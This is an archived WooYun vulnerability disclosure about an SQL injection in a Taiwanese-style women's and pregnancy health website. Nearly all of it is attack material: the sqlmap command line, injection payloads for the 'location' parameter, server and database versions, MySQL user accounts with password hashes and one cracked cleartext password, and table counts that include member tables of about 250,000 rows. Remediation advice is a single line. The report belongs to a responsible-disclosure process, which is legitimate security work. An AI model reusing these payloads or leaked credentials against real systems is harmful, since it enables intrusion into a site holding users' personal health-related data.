乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-26: 细节已通知厂商并且等待厂商处理中 2015-11-29: 厂商已经确认,细节仅向厂商公开 2015-12-09: 细节向核心白帽子及相关领域专家公开 2015-12-19: 细节向普通白帽子公开 2015-12-29: 细节向实习白帽子公开 2016-01-13: 细节向公众公开
祝妳好孕
地址:http://**.**.**.**/womenCare/newsBefAction?doit=searchViewNo&location=2&no=2313
$ python sqlmap.py -u "http://**.**.**.**/womenCare/newsBefAction?doit=searchViewNo&location=2&no=2313" -p location --technique=BETU --random-agent--batch --current-user --is-dba --users --passwords --count --search -C pass
Database: women+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| album_log | 1002901 || log_weblog | 412181 || blog_log | 306524 |Database: women_test+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| album_log | 208460 |Database: women_bak971018+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| album_log | 220548 |Database: old_women2+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| album_log | 207545 |
---Parameter: location (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: doit=searchViewNo&location=2') AND 2511=2511 AND ('blak'='blak&no=2313 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: doit=searchViewNo&location=2') AND (SELECT 4940 FROM(SELECT COUNT(*),CONCAT(0x716a716a71,(SELECT (ELT(4940=4940,1))),0x7170707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('MhBG'='MhBG&no=2313 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: doit=searchViewNo&location=2') AND (SELECT * FROM (SELECT(SLEEP(5)))zCSP) AND ('pLbl'='pLbl&no=2313 Type: UNION query Title: Generic UNION query (NULL) - 12 columns Payload: doit=searchViewNo&location=-7956') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a716a71,0x6651645954554c446f654649597255466c674e756a45504d716d4756465a43415953514e456c6365,0x7170707671),NULL,NULL,NULL,NULL-- -&no=2313---web server operating system: Linux Fedora 3 (Heidelberg)web application technology: Apache 2.0.52, JSPback-end DBMS: MySQL 5.0current user: 'women@localhost'current user is DBA: Truedatabase management system users [7]:[*] ''@'localhost'[*] ''@'womencare'[*] 'root'@'**.**.**.**'[*] 'root'@'**.**.**.**'[*] 'root'@'localhost'[*] 'women'@'**.**.**.**'[*] 'women'@'localhost'database management system users password hashes:[*] root [2]: password hash: *7CC095E596F1266843CA33626F407BC53ECA9FF7 password hash: NULL[*] women [1]: password hash: *5936679E229C6BDD07F1739FB21DB9D30F46855F clear-text password: qpwoeiDatabase: women_bak_catgory+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| member | 184277 || medication_directory | 256 || category | 157 || `catalog` | 154 || magazine_detail | 136 || health_article | 112 || article | 93 || questionary_policlinic | 93 || forum | 80 || services | 63 || blog_photo | 41 || care_mother | 35 || art | 19 || magazine | 16 || ad | 15 || factory | 15 || system_config | 15 || blog_category | 14 || ask | 13 || links | 12 || organization_info | 12 || blog_weblog | 10 || questionary_classroom | 8 || questionary_inpatient | 8 || blog | 7 || women_info | 7 || blog_album | 5 || blog_guestbook | 5 || admin | 4 || blog_friend | 3 || blog_fetus | 1 |+---------------------------------------+---------+Database: women_test+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| album_log | 208460 || member | 178861 || checkpaper | 29031 || photo | 11770 || album | 10872 || ask | 8435 || guestbook | 1449 || ecard | 1156 || medication_directory | 251 || member_bonus | 130 || category | 117 || magazine_detail | 106 || health_article | 90 || services | 44 || checkitem | 38 || news | 31 || magazine | 14 || doctor | 13 || organization_info | 12 || enews_paper | 11 || art | 10 || system_config | 9 || questionary_policlinic | 8 || contact_us | 7 || women_info | 7 || albumguestbook | 6 || dr_say | 6 || links | 6 || classroom_singup | 5 || ad | 4 || classroom | 3 || admin | 2 || dr_mail | 1 || questionary_classroom | 1 || questionary_inpatient | 1 |+---------------------------------------+---------+Database: women_bak971018+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| album_log | 220548 || member | 183779 || checkpaper | 29340 || photo | 12451 || album | 11490 || ask | 8949 || member_bonus | 3464 || albumguestbook | 2075 || guestbook_album | 2000 || ecard | 1213 || member_update_log | 350 || classroom_singup | 308 || medication_directory | 256 || magazine_detail | 136 || news | 120 || category | 117 || health_article | 110 || contact_us | 93 || questionary_policlinic | 92 || enews_paper | 83 || services | 63 || guestbook | 42 || checkitem | 37 || dr_mail | 33 || art | 19 || classroom | 16 || magazine | 15 || doctor | 13 || links | 12 || organization_info | 12 || album_count | 10 || system_config | 9 || questionary_classroom | 8 || questionary_inpatient | 8 || women_info | 7 || dr_say | 6 || ad | 4 || admin | 4 |+---------------------------------------+---------+Database: mysql+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| help_relation | 825 || help_topic | 475 || help_keyword | 401 || help_category | 36 || `user` | 7 || db | 6 |+---------------------------------------+---------+Database: old_women2+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| album_log | 207545 || member | 182289 || checkpaper | 29012 || photo | 11732 || album | 10835 || ask | 8436 || guestbook_album | 2000 || note | 1455 || ecard | 1156 || orders_detail | 783 || orders_master | 590 || article | 278 || instruction | 139 || category | 94 || showpage | 55 || albumforum | 46 || `catalog` | 44 || magazine | 39 || act_result | 38 || checkitem | 38 || act | 32 || doctor | 15 || freight | 15 || factory | 10 || admin | 4 || classroom | 4 || marquee | 3 || news | 3 || illustration | 1 |+---------------------------------------+---------+Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 3189 || STATISTICS | 424 || KEY_COLUMN_USAGE | 291 || TABLE_CONSTRAINTS | 265 || TABLES | 263 || USER_PRIVILEGES | 127 || COLLATION_CHARACTER_SET_APPLICABILITY | 126 || COLLATIONS | 126 || SCHEMA_PRIVILEGES | 92 || CHARACTER_SETS | 36 || SCHEMATA | 8 |+---------------------------------------+---------+Database: women+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| album_log | 1002901 || log_weblog | 412181 || blog_log | 306524 || member | 250420 || log_forum | 235665 || epaper_log | 70301 || checkpaper | 40902 || member_bonus | 40238 || photo | 29796 || album | 28430 || ask | 15933 || albumguestbook | 5281 || blog_photo | 4786 || classroom_singup | 3929 || news | 3353 || blog_category | 3269 || blog_weblog | 3177 || guestbook_album | 2000 || webphoto | 1899 || ecard | 1847 || contact_us | 1845 || blog_guestbook | 1445 || member_update_log | 1089 || enews_paper | 1080 || forum | 691 || blog_friend | 653 || `catalog` | 639 || questionary_policlinic | 535 || magazine_detail | 487 || dr_mail | 461 || blog | 440 || article | 430 || orders_detail | 316 || medication_directory | 306 || blog_album | 299 || health_article | 274 || orders_master | 211 || classroom | 188 || services | 157 || category | 146 || guestbook | 134 || album_count | 91 || epaper | 61 || checkitem | 40 || care_mother | 35 || questionary_inpatient | 34 || webalbum | 34 || doctor | 31 || organization_info | 30 || magazine | 28 || ad | 22 || dr_say | 22 || factory | 21 || questionary_classroom | 20 || art | 19 || system_config | 17 || links | 12 || women_info | 7 || admin | 4 || time_table | 2 || blog_fetus | 1 |+---------------------------------------+---------+columns LIKE 'pass' were found in the following databases:Database: women_bak_catgoryTable: account[1 column]+--------+-------------+| Column | Type |+--------+-------------+| passwd | varchar(10) |+--------+-------------+Database: women_bak971018Table: account[1 column]+--------+-------------+| Column | Type |+--------+-------------+| passwd | varchar(10) |+--------+-------------+Database: womenTable: account[1 column]+--------+-------------+| Column | Type |+--------+-------------+| passwd | varchar(10) |+--------+-------------+Database: mysqlTable: user[1 column]+----------+----------+| Column | Type |+----------+----------+| Password | char(41) |+----------+----------+Database: women_testTable: account[1 column]+--------+-------------+| Column | Type |+--------+-------------+| passwd | varchar(10) |+--------+-------------+Database: women_bak_catgoryTable: account[0 entries]+--------+| passwd |+--------++--------+Database: women_testTable: account[0 entries]+--------+| passwd |+--------++--------+Database: women_bak971018Table: account[0 entries]+--------+| passwd |+--------++--------+Database: womenTable: account[0 entries]+--------+| passwd |+--------++--------+Database: mysqlTable: user[4 entries]+----------------------------------------------------+| Password |+----------------------------------------------------+| *5936679E229C6BDD07F1739FB21DB9D30F46855F (qpwoei) || *5936679E229C6BDD07F1739FB21DB9D30F46855F (qpwoei) || *7CC095E596F1266843CA33626F407BC53ECA9FF7 || *7CC095E596F1266843CA33626F407BC53ECA9FF7 |+----------------------------------------------------+
上WAF。
危害等级:高
漏洞Rank:18
确认时间:2015-11-29 18:09
感謝通報
2016-01-12:HITCON 於接獲通報後多次 email 該網站所示之服務信箱,至今尚無回應。
